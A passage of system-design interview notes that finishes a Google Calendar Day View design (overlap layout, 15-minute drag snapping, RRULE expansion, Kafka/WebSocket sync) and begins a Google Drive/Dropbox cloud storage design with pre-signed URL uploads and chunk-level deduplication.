Real-time update latency	< 1 second for shared calendars
Availability	99.9%
Consistency	Eventual for real-time; strong for event creation/deletion
Offline	Read-only view from local cache; writes queued

Consistency model:

Domain	Model	Justification
Event CRUD	Strong (PostgreSQL)	Prevents double-booking, attendee confusion
Real-time collaboration	Eventual (WebSocket + Kafka)	1-second delay acceptable; last-write-wins
RRULE expansion	Computed on read	Recurrences are derived — no consistency issue

🧠 Mental Model

Google Calendar Day View has three core flows:

Load flow — user navigates to a date → client fetches events for that day → frontend computes the layout (overlaps, positions, widths) → renders the grid
Edit flow — user drags/resizes/clicks → optimistic UI update locally → API call → server persists → WebSocket broadcasts change to collaborators
Real-time flow — collaborator edits a shared event → Event Service writes to DB → Kafka message → Notification Service → WebSocket push → all connected clients for that calendar receive the update

User navigates to Day View
         │
         ▼
   Fetch /events?date=X
         │
    ┌────┴────────────────────────────┐
    │  LAYOUT ENGINE (client-side)    │
    │  1. Sort events by start time   │
    │  2. Detect overlapping groups   │
    │  3. Assign columns + widths     │
    └────┬────────────────────────────┘
         │
         ▼
   Render 24h grid with positioned events
         │
    User drags event
         │
    ┌────┴──────────────────────────────┐
    │  DRAG ENGINE                      │
    │  1. Snap to 15-min increments     │
    │  2. Optimistic update (local)     │
    │  3. PATCH /events/:id on drop     │
    │  4. WS broadcast to collaborators │
    └───────────────────────────────────┘

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path	Perceived latency	Optimistic UI — event moves instantly on drag; API fires async
Reliable Path	Correctness	If PATCH fails, revert optimistic update + show error toast

5. API Design

Calendar APIs

Method	Path	Description
GET	`/api/v1/events?calendarId=&start=&end=`	Fetch events for a date range. Returns expanded recurrences.
POST	`/api/v1/events`	Create event. Returns event with server-assigned ID (idempotency key in body).
PATCH	`/api/v1/events/:id`	Partial update — move/resize uses this. Supports `start`, `end`, `recurrenceAction`.
DELETE	`/api/v1/events/:id?recurrenceAction=`	Delete single instance or all/future recurrences.
GET	`/api/v1/calendars`	List user's calendars (own + shared). Used to set color coding.

WebSocket

Event	Direction	Payload
`calendar.event.updated`	Server → Client	`{ eventId, calendarId, changes, updatedBy }`
`calendar.event.deleted`	Server → Client	`{ eventId, calendarId, recurrenceAction }`

[!TIP]
Interview tip: The recurrenceAction parameter on PATCH/DELETE is a key design question. Options: THIS (only this instance), THIS_AND_FOLLOWING, ALL. Say: "I expose this as a query parameter because the semantic differs from a normal update — it's modifying the RRULE or creating an exception, not just patching data."

6. End-to-End Flow

6.1 Day View Load

User navigates to Day View for date 2025-03-28.
Client sends GET /api/v1/events?calendarId=primary&start=2025-03-28T00:00Z&end=2025-03-28T23:59Z.
Event Service queries PostgreSQL: fetch base events + any RRULE exceptions that fall on this date. For each recurring event, expand the RRULE server-side and return the occurrence for this day as a concrete event object.
Response arrives (≤ 500ms). Client receives array of event objects, each with id, start, end, title, calendarId.
Layout Engine runs: sorts events by start time → groups overlapping events → assigns each event a column index and a width fraction. A group of 3 overlapping events each gets width = 1/3 of the slot.
Virtual scroll renders only the visible portion of the 24h grid. Events are positioned absolutely using top = (startMinutes / 1440) * gridHeight and height = (durationMinutes / 1440) * gridHeight.
WebSocket connection opens to wss://calendar.google.com/ws?calendarId=primary. Client subscribes to shared calendars.

6.2 Drag & Drop (Move Event)

User starts dragging an event. Client immediately applies optimistic update: the event visually follows the cursor. The original time is saved in memory for rollback.
As the event moves, client snaps the top position to the nearest 15-minute increment (every gridHeight / 96 pixels).
On drag end, client computes the new start/end from the final Y position.
Client sends PATCH /api/v1/events/:id with { start: newStart, end: newEnd }.
Event Service writes to PostgreSQL. If the event is a recurring instance and recurrenceAction=THIS, it creates an exception record (stores the modified occurrence, marks the RRULE to skip this date).
Event Service publishes calendar.event.updated to Kafka topic calendar-events.
Notification Service consumes from Kafka, looks up all WebSocket connections subscribed to this calendarId, and pushes the update.
All collaborators' clients receive the WS event and re-render the event at the new time.
If PATCH fails (network error, conflict): client reverts optimistic update, shows error toast, event snaps back to original position.

6.3 🔄 Complete Lifecycle: Load → Layout → Render → Interact → Sync → Re-render

This is the full end-to-end picture — every phase a request passes through from the moment a user opens the day view to the moment a collaborator sees the update.

Load — User navigates to a date. Client fires GET /events?start=&end=. Event Service queries PostgreSQL, expands RRULE occurrences for this day, returns JSON array.
Layout — Client runs the interval partitioning algorithm: sort → group overlapping events → assign columns → compute width fractions. Pure CPU, no network.
Render — Virtual scroll activates. Only the visible hour range is rendered as DOM nodes. Events are positioned absolutely: top = (startMin/1440) * gridH, height = (durationMin/1440) * gridH.
Interact — User drags an event. DOM mutation (no React re-render) moves the event at 60fps. On drop: snap to nearest 15-min grid, compute new time, fire PATCH /events/:id optimistically.
Sync — Event Service writes to PostgreSQL, publishes calendar.event.updated to Kafka. Notification Service consumes, looks up WebSocket connections for all calendarId subscribers in Redis, pushes the update.
Re-render — Every collaborator's client receives the WS push. Client patches its local event array with the change, re-runs layout for the affected time slot, and re-renders the moved event at the new position.

[!IMPORTANT]
The cycle is: Load once → Layout locally → Render virtually → Interact optimistically → Sync async → Re-render incrementally. No full page reload at any step. Each phase is independent and can fail gracefully without breaking the others.

7. High-Level Architecture

Simple Design

Evolved Design (with Real-Time + Scale)

[!NOTE]
Key Insight: The WebSocket server is stateless fanout — it doesn't store event data. Kafka decouples write path from notification path. Event Service never directly calls WebSocket servers.

8. Data Model

Entity	Storage	Key Columns	Why this store
Event	PostgreSQL	`event_id`, `calendar_id`, `owner_id`, `title`, `start_utc`, `end_utc`, `rrule`, `is_all_day`	ACID — prevents double-booking; relational joins for attendees
Recurrence Exception	PostgreSQL	`event_id`, `original_date`, `new_start_utc`, `new_end_utc`, `is_deleted`	Models RRULE overrides without duplicating base event
Calendar	PostgreSQL	`calendar_id`, `owner_id`, `name`, `color`, `timezone`	Relational — permissions, sharing, color metadata
Calendar Members	PostgreSQL	`calendar_id`, `user_id`, `role` (owner/editor/viewer)	Many-to-many sharing; permission checks at write time
WS Session Map	Redis	`calendarId → [connectionId, ...]`	Ephemeral; TTL = connection lifetime. DB lookup = too slow for fanout
Calendar Metadata Cache	Redis	`userId:calendars → JSON`	TTL = 5min. Avoids DB hit on every day view load

[!NOTE]
Key Insight: Recurring events are stored as a rule + exceptions model (not pre-expanded rows). Expansion happens at read time. Pre-expanding 10 years of weekly events = 520 rows per event × 500M users = storage explosion.

9. Deep Dives

9.1 🧠 Layout Algorithm — Interval Partitioning Problem

Here's the problem we're solving: Multiple events on the same day can have overlapping time ranges. Rendering them stacked (one behind the other) makes them unreadable. We need an algorithm that places overlapping events side-by-side with correct widths so all are visible simultaneously.

This is a classic interval partitioning problem — the same problem as scheduling jobs on the minimum number of machines such that no two overlapping jobs share a machine. The minimum number of machines needed = the maximum number of events overlapping at any single point in time.

Naive solution: Render each event at full width. Overlapping events cover each other — user can't see or click the hidden events.

🧠 Layout Algorithm (Core) — 4 Steps:

Step 1 — Sort events by start time
Sort all events for the day by start_utc ascending. This ensures we process events in chronological order and can greedily assign columns.

Step 2 — Group overlapping events
Scan the sorted list. Maintain a running groupEndTime = max end time seen so far. If the next event's start < groupEndTime, it belongs to the current overlapping group. When start >= groupEndTime, the current group is complete — finalize widths and start a new group.

Step 3 — Assign columns
Within each overlapping group: maintain an array of columns, each tracking the latest end_time of the event placed there. For each event, find the first column where column.endTime <= event.startTime. Place the event there and update the column's end time. If no column fits, add a new column.

Step 4 — Calculate width dynamically
After all events in a group are assigned: width = 1 / totalColumns. left offset = columnIndex / totalColumns. A group of 3 overlapping events each renders at 33% width, placed at 0%, 33%, 66% left.

Complexity: O(n log n) sort + O(n·c) placement where c = max concurrent overlaps. For typical calendars (c ≤ 5), effectively O(n).

Trade-off accepted: The greedy column assignment doesn't always minimize column count for adversarial inputs (that's NP-hard for general interval graphs). For calendar data — where c is small and events are human-scheduled — greedy produces the same result as optimal.

[!NOTE]
Key Insight: Event layout is the interval partitioning problem. Minimum columns needed = maximum depth of overlapping events at any point. This is computed entirely client-side in O(n log n) — the backend only returns raw start/end times.

9.2 Drag & Drop with 15-Minute Snapping

Here's the problem we're solving: Drag-and-drop on a continuous pixel grid gives sub-second precision, but calendar events are scheduled in meaningful increments (15 min, 30 min). Allowing arbitrary placement (e.g., 10:03 AM) creates chaos. We need to snap movement to 15-minute increments in real time, at 60fps.

Naive solution: On each mouse/touch move, compute the time from Y position, round to nearest 15 minutes, re-render the event. Problem: React re-renders on every mousemove event = 60–120 events/sec = performance bottleneck.

Chosen solution — CSS transform + commit-on-drop:

During drag: do not update React state on every mousemove. Instead, directly mutate the DOM element's transform: translateY(px). This bypasses React entirely and runs at 60fps with zero re-renders.
Snap logic runs in the event handler (not in React): snappedY = Math.round(rawY / snapInterval) * snapInterval where snapInterval = gridHeight / 96 (96 = 4 per hour × 24 hours).
On drop: compute the new time from snappedY, then trigger a single React state update + API call.
Optimistic update: React state updates immediately with the new time. API call fires async. If it fails, revert.

Trade-off accepted: Directly mutating the DOM breaks React's virtual DOM contract — this event's position is "out of sync" during drag. This is acceptable because: (a) it's a known, contained exception; (b) the React state is corrected on drop; (c) the visual result is smooth 60fps — no alternative achieves this with React re-renders.

[!NOTE]
Key Insight: Drag-and-drop at 60fps = decouple visual feedback (DOM mutation) from data update (React state). Commit once on drop, not on every pixel.

9.3 Recurring Events — RRULE Expansion

Here's the problem we're solving: A "weekly team standup every Monday" is one event logically, but needs to appear on every Monday in the day view. How do we store this efficiently and handle edits (change only this occurrence vs. all future ones)?

Naive solution — Pre-expand and store: Create one DB row per occurrence. A weekly event for 2 years = 104 rows. Fine for one user. At 500M users with average 20 recurring events each = 500M × 20 × 52 = 520 billion rows. Not viable.

Chosen solution — Store rule, expand on read:

Store one row with the RRULE string (RFC 5545 format): e.g., RRULE:FREQ=WEEKLY;BYDAY=MO
On GET /events?start=&end=, the Event Service calls an RRULE library to expand only the occurrences within the requested window. For a day view, this expands at most 1–2 occurrences.
Exceptions (user edits "only this event"): store a row in recurrence_exceptions with original_date + modified fields. The expand logic checks exceptions and overrides the generated occurrence.
"This and following": update the base event's UNTIL to originalDate - 1 day, create a new base event starting from originalDate with the new RRULE. Two rows represent the split.

Trade-off accepted: Expansion logic lives in the service layer (not the DB). This means every day-view load runs the RRULE library. At 50M concurrent users loading day views, this is ~50M RRULE expansions/sec. Each expansion is O(1) for a single-day window — microseconds. Acceptable.

[!NOTE]
Key Insight: RRULE is a read-time computation problem, not a storage problem. Store the rule + exceptions. Expand at query time. Pre-expanding = write amplification with no benefit.

9.4 Timezone Rendering

Here's the problem we're solving: A user in New York creates an event at 9 AM EST. Their colleague in London views the same shared event. London should see it at 2 PM GMT. The stored time must be unambiguous regardless of who reads it or where.

Solution:

All times stored in UTC in the DB (start_utc, end_utc — TIMESTAMPTZ columns).
Each calendar has a timezone field (IANA timezone string, e.g., America/New_York). Each user also has a profile timezone.
On read: start_utc is returned to the client. The client renders using Intl.DateTimeFormat with the user's local timezone.
The day view renders the grid in the user's timezone, not the event's origin timezone.
For recurring events with DST transitions: the RRULE library handles DST-aware expansion (a "9 AM" weekly event stays at 9 AM local time across DST boundaries, not at a fixed UTC offset).

[!NOTE]
Key Insight: Store UTC, render local. The DB never knows about timezones. The client knows everything about display. DST is a display-layer problem.

9.5 Backend: Consistency, Conflict Resolution & Notification Fan-Out

Here's the problem we're solving: The backend has three non-trivial responsibilities that are easy to underestimate: (1) preventing double-booking when two users edit the same event concurrently, (2) ensuring event writes are ACID so attendee lists never get corrupted, and (3) fanning out notifications efficiently when a shared calendar event is modified.

Consistency — Why PostgreSQL, not a NoSQL store:

Calendar events have relational integrity requirements: an event belongs to a calendar, a calendar has members with roles, an event has attendees. A write that adds an attendee must also check the user's permission level. These multi-table constraints require ACID transactions — not eventual consistency.

At 167K writes/sec, a sharded PostgreSQL cluster (sharded by user_id) handles this easily. Each shard owns a user's events. Cross-user queries don't exist — a user only reads their own calendars and explicitly shared ones.

Conflict Resolution — Concurrent edits to a shared event:

Problem: User A and User B both open the same shared meeting. A changes the title; B changes the time — simultaneously. Both fire PATCH /events/:id. The second write wins silently. Neither user knows their collaborator was editing at the same time.

Chosen solution — optimistic locking with version field:

Every event row has a version integer.
PATCH /events/:id must include the version the client last saw.
Event Service: UPDATE events SET ..., version = version+1 WHERE event_id = :id AND version = :clientVersion.
If rows updated = 0 → version mismatch → return 409 Conflict.
Client receives 409 → fetches latest event state → shows diff to user → user resolves.

For calendar events (unlike Google Docs), last-write-wins is often acceptable — two people rarely edit the same 30-minute meeting simultaneously. Optimistic locking adds safety without the complexity of OT/CRDT.

Notification Fan-Out — Shared calendars with many members:

Problem: A company-wide "All Hands" calendar has 5,000 members. One edit → must push WebSocket notification to up to 5,000 active connections. Doing this synchronously in the Event Service blocks the write path.

Chosen solution — Kafka + Notification Service:

Event Service writes to PostgreSQL, then publishes { eventId, calendarId, changes } to Kafka topic calendar-events. Write path done — returns 200 to client immediately.
Notification Service (separate process) consumes from Kafka. Looks up calendarId → [userId, ...] from Calendar Members table (cached in Redis, TTL = 10min).
For each member: check if they have an active WebSocket connection via ws-sessions:{userId} in Redis. If yes, route to the correct WS server node via Redis pub/sub and push the event.
Offline members: skip WS push. On their next day-view load, they'll fetch fresh data from PostgreSQL.

This decouples the write path from notification delivery. A 5,000-member calendar generates 5,000 WS pushes — but that's Notification Service's problem, not Event Service's.

[!NOTE]
Key Insight: The backend's job is consistency + fan-out, not layout or rendering. PostgreSQL gives ACID. Optimistic locking resolves concurrent edits. Kafka decouples the write path from the notification path — Event Service never waits for 5,000 WS pushes.

10. Bottlenecks & Scaling

What breaks first at 10× scale:

Event Service write path — 1.67M writes/sec. Single PostgreSQL primary caps at ~50–100K writes/sec.
- Shard by user_id (or calendar_id). Events are never queried cross-user — sharding is clean.
- Each shard = independent PostgreSQL primary + 2 read replicas.
RRULE fan-out for shared calendars — When a user edits a recurring event with 500 attendees, Notification Service must push to 500 WebSocket connections.
- Kafka topic partitioned by calendar_id. Each Notification Service instance handles a partition. Scales horizontally.
- WebSocket server cluster: Redis pub/sub routes messages to the correct WS server node holding each connection.
Day view cache — 50M concurrent users each load ~20 events. At 3–5 API calls per load, that's 150–250M reads/sec.
- Cache recent day views in Redis: key = events:{userId}:{date}, TTL = 5 minutes.
- Cache invalidation: when an event is written, invalidate all affected users' date keys. Acceptable since events are rarely shared with >10 users.

CDN strategy: All static assets (JS, CSS, fonts) served from CDN edge. First load: 200ms. Subsequent loads: service worker cache → near-instant.

11. Failure Scenarios

Failure	Impact	Recovery
PostgreSQL primary fails	Event writes fail; reads continue from replica	Automatic failover (Patroni / RDS Multi-AZ). Reads never interrupted.
WebSocket server node fails	~N/totalNodes users lose real-time updates	Client reconnects with exponential backoff. WS session map in Redis allows reconnection to any node.
Kafka consumer lag	Real-time updates delayed (seconds to minutes)	Backpressure alert. Consumer auto-scales. Events are durable in Kafka — no loss, just delay.
PATCH fails on drag drop	Event appears moved in client but not saved	Optimistic update reverts. User sees error toast: "Failed to save — changes reverted."
Clock skew between clients	Concurrent edits to same event overlap	Last-write-wins with server timestamp. For shared events, this is acceptable — calendar conflicts are rare.
CDN outage	Initial load fails or is slow	API Gateway serves static assets as fallback (slower but functional).

12. Trade-offs

Optimistic UI vs. Confirmed Update

Dimension	Optimistic UI	Wait for confirmation
Perceived latency	Instant (0ms)	Full round-trip (100–300ms)
Risk	Revert on failure (jarring UX)	No visual inconsistency
Complexity	Rollback logic required	Simple
User experience	Smooth, modern feel	Laggy on slow networks

Chosen: Optimistic UI — calendar events rarely fail to save. The latency improvement (0ms vs 200ms) is significant at scale and across mobile connections.

[!NOTE]
Key Insight: Optimistic UI is only viable when the failure rate is low and rollback is well-defined. Event drag-and-drop fails <0.1% of the time — making it the ideal candidate.

WebSocket vs. Polling for Real-Time Sync

Dimension	WebSocket	Long Polling
Real-time latency	< 100ms	1–30s
Server connections	Persistent (expensive)	Stateless (cheaper per req)
Scale complexity	Need WS cluster + Redis routing	Any stateless server
Bandwidth	Low (push only changed data)	Higher (repeated full requests)

Chosen: WebSocket — for collaborative calendars, 1-second real-time latency is the UX requirement. Polling at 1-second intervals for 500M users = 500M requests/sec of empty polls. That's the wrong math.

[!NOTE]
Key Insight: WebSocket vs polling is a math problem. 500M users × 1 poll/sec = 500M empty requests/sec. WebSocket = push only when something changes.

Recurring Event Storage: Pre-Expand vs. Rule + Expand

Dimension	Pre-expand rows	RRULE rule + expand on read
Read complexity	Simple SQL range query	RRULE library call
Write complexity	Simple	Simple
Storage	O(n × recurrences) = billions of rows	O(n) — one row per recurring series
Handling exceptions	Update single row	Exception table lookup
Handling "edit all future"	Update many rows	Update UNTIL + new rule row

Chosen: RRULE rule + expand on read — storage efficiency is overwhelming at 500M users. RRULE expansion for a single day is O(1) — trivial cost.

[!NOTE]
Key Insight: Expand at read time for a 24-hour window = at most 2–3 occurrences. Pre-expand for 2 years = 52–730 rows per event. The read cost is the same; the write/storage cost is radically different.

Interview Summary

Key Decisions

Decision	Problem it solves	Trade-off accepted
Optimistic UI for drag & drop	Instant visual feedback; 60fps drag	Must implement rollback on API failure
DOM mutation during drag (not React state)	60fps without re-render bottleneck	DOM temporarily out of sync with React virtual DOM
RRULE rule + expand on read	O(n) storage instead of O(n × recurrences)	RRULE expansion logic in service layer on every read
WebSocket over polling	< 1s real-time updates	Stateful server cluster; Redis routing needed
UTC storage + client-side timezone render	Single source of truth; no timezone bugs	Client must handle DST-aware display logic
PostgreSQL with sharding	ACID for event CRUD; prevents double-booking	Shard key must be chosen carefully (user_id)

Fast Path vs. Reliable Path

FAST PATH (optimized for perceived latency)
  User drags event
      │
      ▼
  DOM translate (60fps, no React re-render)
      │
  User drops
      │
      ▼
  React state update → event renders at new time immediately
      │
  PATCH /events/:id fires async (non-blocking)


RELIABLE PATH (optimized for correctness)
  If PATCH succeeds → collaborators receive WS push → re-render
  If PATCH fails   → revert React state → event snaps back → error toast

Key Insights Checklist

"Drag at 60fps requires bypassing React. I mutate the DOM directly during drag, commit once on drop. DOM and React are briefly out of sync — that's acceptable because the window is bounded and intentional."
"Recurring events are a storage problem in disguise. Store the RRULE rule, not the expanded instances. One row per series. Expansion is O(1) per day-view load."
"WebSocket vs polling is a math problem. 500M users × 1 poll/sec = 500M empty requests/sec. Pushed updates from WebSocket cost nothing when nothing changes."
"Optimistic UI only works when failure rate is low and rollback is well-defined. Calendar drag-and-drop fails < 0.1% of the time — making it the ideal use case."
"All times stored in UTC. The DB has no concept of timezone. DST is a client-side rendering concern, not a persistence concern."
"Overlapping event layout is a greedy column-packing algorithm — runs client-side in O(n log n). The API returns raw times; the client computes visual positions. This lets mobile and web implement different strategies independently."

Cloud Storage (Google Drive / Dropbox)

Arghya Majumder — Sat, 28 Mar 2026 00:31:23 +0000

System Design: Cloud Storage (Google Drive / Dropbox)

1. Problem + Scope

Design a cloud storage platform (Google Drive / Dropbox) supporting file upload, download, sync across devices, folder management, and sharing with permissions — at 50 million DAU storing 10 billion files.

In Scope: File and folder upload/download, auto-sync across devices, directory structure (create/delete/rename/move), file sharing with read/write permissions, storage quota per user, chunk-level deduplication.

Out of Scope: Real-time collaborative editing (separate system — see google-docs.md), video transcoding, full-text search within documents, virus scanning internals, mobile offline-first CRDT sync.

2. Assumptions & Scale

Active users:           50 million DAU
Files per user:         ~200 average
Total files:            10 billion
Daily uploads:          50 million files/day
Average file size:      500 KB
Large files (>10 MB):   5% of uploads = 2.5 million/day

Storage:
  New data/day:   50M files x 500KB = 25 TB/day
  After dedup:    ~60% unique (Dropbox reports ~70% dedup ratio)
                  -> ~15 TB/day net new storage
  5-year total:   15 TB x 365 x 5 = ~27 PB

Upload throughput:
  50M uploads/day / 86,400s = ~580 uploads/sec average
  Peak (10x):              ~5,800 uploads/sec

Metadata reads (folder browsing):
  50M DAU x 20 opens/day = 1B reads/day = ~11,500 reads/sec

Chunk operations:
  Large file (1 GB) = 1 GB / 5 MB chunk = 200 chunks
  5,800 uploads/sec x ~5 chunks avg = ~29,000 chunk uploads/sec
  -> S3 must handle ~29K PUT requests/sec

Sync notifications:
  50M uploads/day -> fan-out to avg 3 devices = 150M notifications/day
  -> ~1,700 WebSocket pushes/sec (manageable with pub/sub)

These numbers drive the following decisions: pre-signed URLs (cannot proxy 25 TB/day), chunk-level dedup (must reduce 27 PB over 5 years), PostgreSQL sharding (580 writes/sec, well within range but metadata is relational), and WebSocket + message queue for sync (1,700 pushes/sec is lightweight but must survive upload service restarts).

3. Functional Requirements

User creates an account and gets a storage quota (e.g., 15 GB free)
Upload files and folders of any size, including multi-GB videos
Download files from any device and location
Auto-sync: all connected devices update within 2 seconds when any device changes a file
Share files and folders with other users; assign read or write permission
Directory operations: create, rename, delete, and move folders and files
Resume interrupted uploads — a failed chunk does not restart the whole file
Storage deduplication — identical content stored only once regardless of who uploaded it

4. Non-Functional Requirements

Requirement	Target
Availability	99.99% — prefer AP over CP for upload and sync
Durability	99.999999999% (11 nines) — replicated across AZs in S3
Upload latency	Bounded by client bandwidth — backend adds less than 100ms overhead
Sync latency	Less than 2 seconds after upload completes
Metadata read latency	Less than 50ms p99 for folder listing
Consistency — metadata	Strong (ACID) for quota enforcement and permission checks
Consistency — sync	Eventual — 1–2 second lag between devices is acceptable
Large file support	Files up to 15 GB via chunked multipart upload
Storage efficiency	Chunk-level dedup targeting 60–70% reduction

Consistency Model

Domain	Model	Reason
Quota enforcement	Strong (ACID)	User must never exceed quota; two concurrent uploads need serialization
Permission checks	Strong (ACID)	Access control must be correct at all times
Folder listing	Eventual (read replica)	1–2s stale list is invisible to users
Cross-device sync	Eventual	Notification-driven pull; brief lag acceptable

[!IMPORTANT]
CAP framing: Upload and sync prefer availability — a 1–2 second sync lag is acceptable. Quota and permission operations prefer consistency — a user must never exceed quota or access a file they were not granted permission to.

🧠 Mental Model

A cloud storage system is not just a file store — it continuously syncs file state across distributed clients, ensuring changes propagate reliably and efficiently. Three flows define everything: upload (client chunks file → pre-signed URL → S3 directly), metadata management (DB tracks what exists, not the bytes), and sync (S3 event → notification service → WebSocket push to other devices). The file bytes and the file record travel completely separate paths.

Google Drive is not a filesystem. It is a metadata store with a blob storage backend.

A "folder" is not a directory — it is a row in a database with type = folder. Moving a file is not moving bytes — it is changing a parent_id field. The actual bytes live in S3, addressed by a content hash.

                    +-----------------------------------------------------+
                    |                    FAST PATH                        |
  +--------+  chunk |  +----------------+   pre-signed URL               |
  | Client | ------>|  | Upload Service | ---------------------> S3/Blob |
  |(Chunker|        |  +-------+--------+   client uploads directly      |
  |+Watcher|        +----------|-----------------------------------------+
  +--------+                   | metadata write (before ACK)
                    +----------v-----------------------------------------+
                    |                  RELIABLE PATH                      |
                    |  Metadata DB (file record, hash, parent_id, quota)  |
                    |  Notification Service --> sync other devices        |
                    +-----------------------------------------------------+

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path — upload	Throughput	Pre-signed URL; client uploads chunks directly to S3; backend touches zero bytes
Reliable Path — metadata	Durability + Correctness	DB write before upload confirmed; quota enforced atomically
Dedup Path — storage	Efficiency	SHA-256 chunk hash = content-addressable key; second upload = metadata pointer only
Sync Path — devices	Near-real-time	S3 event → MQ → Notification Service → WebSocket push; pull-on-notification

[!IMPORTANT]
File data never touches the application server. The backend only handles metadata and issues pre-signed tokens. File bytes go client → S3 directly. This is the architectural decision that makes Google Drive scale — the upload bottleneck is the client's bandwidth and S3 throughput, not application server capacity.

[!NOTE]
Key Insight: Deduplication works at the chunk level, not the file level. If you upload the same 10 GB video twice, only one copy of each chunk is stored. The second upload is just a metadata pointer — no bytes transferred. This is why Dropbox could serve billions of files at a fraction of expected storage cost.

6. API Design

Method	Path	Description
POST	/api/v1/files/upload/init	Initiate chunked upload, returns {upload_id, pre_signed_urls[]}
POST	/api/v1/files/upload/complete	Confirm all chunks uploaded, triggers processing
GET	/api/v1/files/{id}/download	Returns pre-signed S3 download URL (not the file bytes)
GET	/api/v1/folders/{id}/children	List folder contents with metadata
POST	/api/v1/files/{id}/share	Share with {email, permission: viewer/editor}
GET	/api/v1/files/{id}/versions	List file version history

[!NOTE]
The most architecturally interesting endpoints are upload/init and download — neither passes file bytes through the app server. Upload/init returns pre-signed S3 URLs so the client uploads directly to S3. Download returns a pre-signed URL the client fetches directly from CDN. The app server only handles metadata.

7. End-to-End Flow

7.1 Upload Flow

File upload with pre-signed URL and chunk deduplication — the happy path from client to sync.

The story in plain English:

Client initiates upload by calling POST /files/upload/init with the file name, size, and a SHA-256 hash of the entire file.
Upload Service checks if this exact file (by hash) already exists in storage — chunk-level deduplication. If another user already uploaded the same file, we skip uploading those chunks entirely.
For chunks that don't exist yet, the server generates pre-signed S3 PUT URLs — one per chunk — and returns them to the client.
The client uploads each chunk directly to S3 in parallel. The app server never touches file bytes. This is how you scale uploads without server bottleneck.
Once all chunks are uploaded, the client calls POST /files/upload/complete with the file_id and chunk ETags.
Upload Service commits the file metadata record to PostgreSQL — pointing to the chunk hashes in S3, not the file bytes directly.
A file_ready event is published to Kafka. Notification Service consumes it and pushes a sync event to the user's other devices via WebSocket.


GOOGLE DRIVE — FILE UPLOAD SEQUENCE
═══════════════════════════════════════════════════════════════════════════════

  Client      Upload Svc    Dedup Check      S3         Message Q    Notify Svc
    │               │              │           │               │            │
    │─POST /files/initiate─────────►           │               │            │
    │  {name, size, chunk_count,   │           │               │            │
    │   total_hash}                │           │               │            │
    │               │─does total_hash exist?───►│              │            │
    │               │◄─────[no: new] / [partial: some chunks exist]          │
    │               │─check user quota          │              │            │
    │               │─generate pre-signed PUT URLs for NEW chunks only───────►
    │               │◄──────────────────────────│              │            │
    │◄──────────────│ {file_id, upload_id,       │             │            │
    │  pre_signed_urls[] for unique chunks}      │             │            │
    │               │              │             │             │            │
    │               │   ┌──────────────────────────────────────────────────┐ │
    │               │   │  Client uploads ONLY new chunks directly to S3   │ │
    │               │   │  (parallel, bypasses app server entirely)        │ │
    │               │   └──────────────────────────────────────────────────┘ │
    │─PUT chunk_1 (pre-signed URL)──────────────►│               │            │
    │─PUT chunk_2 (pre-signed URL)──────────────►│               │            │
    │─PUT chunk_N (pre-signed URL)──────────────►│               │            │
    │               │              │            │─upload_completed events───►│
    │               │              │            │  {file_id, chunk_ids}│
    │               │◄─────────────────────────────consume + verify chunks──│
    │─POST /files/complete──────────►            │               │            │
    │  {file_id, etags[]}           │            │               │            │
    │               │─commit file_metadata to DB │               │            │
    │               │  (points to chunk hashes,  │               │            │
    │               │   not raw bytes)           │               │            │
    │               │─decrement user quota atomically            │            │
    │◄──────────────│ 200 OK {download_url}       │              │            │
    │               │               │             │              │            │
    │               │─file_ready event──────────────────────────►│            │
    │               │  {user_id, file_id}       │               │─consume───►│
    │               │              │            │               │─WS push────►
    │               │              │            │               │  sync file_id
    │               │              │            │               │  to other   │
    │               │              │            │               │  devices    │

[!NOTE]
Key Insight: The 3-step upload (initiate → upload to S3 → complete) is the correct pattern for large files. The backend never touches file bytes — it only creates pre-signed URLs and records metadata on completion. This is how you scale to 5,800 uploads/sec without application server bottleneck.

7.2 Download Flow

File download with permission check and pre-signed CDN/S3 URL — the client fetches bytes directly, never through the app server.

The story in plain English:

User clicks a file — client calls GET /files/{id}/download.
Metadata Service checks Redis cache for file metadata (name, size, S3 location). Cache hit returns in < 1ms. Cache miss falls back to PostgreSQL.
Permission Service checks that this user has at least read access to the file (via the permissions table).
Metadata Service generates a pre-signed S3/CDN GET URL with a short TTL (15 minutes) and returns it to the client.
Client fetches the file directly from the CDN edge node — the app server is completely out of the data path.
CDN cache hit: file served from edge in milliseconds. Cache miss: CDN fetches from S3 origin, caches at edge for future requests. The app server never touches file bytes in either direction — upload or download.

[!NOTE]
Key Insight: The app server never touches file bytes in either direction — upload bytes go Client → S3 directly via pre-signed PUT, download bytes go S3/CDN → Client directly via pre-signed GET. The app server is purely a metadata and URL-signing service.

8. High-Level Architecture

Simple Design

Evolved Design — with CDN, Dedup, Sync Queue

9. Data Model

Entity	Storage	Key Columns	Why this store
file_metadata	PostgreSQL	file_id UUID PK, name, type, parent_id FK, owner_id, size_bytes, content_hash, s3_path, created_at, modified_at, deleted_at	Relational — parent-child folder hierarchy, soft deletes, O(1) rename and move via single field update
chunks	PostgreSQL	chunk_hash SHA-256 PK, s3_path, size_bytes, ref_count, created_at	Content-addressable: hash IS the key; ref_count enables garbage collection of orphaned chunks
file_chunks	PostgreSQL	file_id FK, chunk_index, chunk_hash FK	Join table mapping a file to its ordered list of chunk hashes; enables partial dedup per file
permissions	PostgreSQL	file_id FK, user_id FK, permission enum read/write/owner, granted_at — PK is file_id + user_id	ACID required — permission checks must be strongly consistent; JOIN with file_metadata is natural SQL
sync_state	Redis	user_id → set of device_ws_ids, TTL 30min	Ephemeral — tracks which WebSocket connections belong to a user; TTL handles disconnects automatically
quota_cache	Redis	user_id → bytes_used, TTL 60s	Write-through cache — quota checks hit Redis first; DB is source of truth but 60s stale acceptable
user_sessions	Redis	session_token → user_id, TTL 24h	Session data is ephemeral and high-read; Redis sub-millisecond lookup vs 10–50ms DB I/O

[!NOTE]
Key Insight: The chunks table makes the hash the primary key — the content IS the address. Deduplication, integrity checking, and content-addressable retrieval are all solved by the same SHA-256 hash. No separate dedup service state is needed.

10. Deep Dives

10.1 Pre-Signed URL Upload Flow

Here is the problem: at peak load, 5,800 uploads/sec at ~2.5 MB/chunk means 14.5 GB/sec of file data in flight. Routing this through application servers would require provisioning server capacity for a problem that is purely about moving bytes from one place to another.

Naive solution: Client POSTs file bytes to /files/upload → server streams to S3. This fails because: (1) server holds the TCP connection open for the entire upload duration — 200 MB file on a slow connection = 30+ seconds of connection held, (2) 25 TB/day through app servers = bandwidth cost and compute cost that scales linearly with file size, not with request count.

Chosen solution — 3-step pre-signed URL flow:

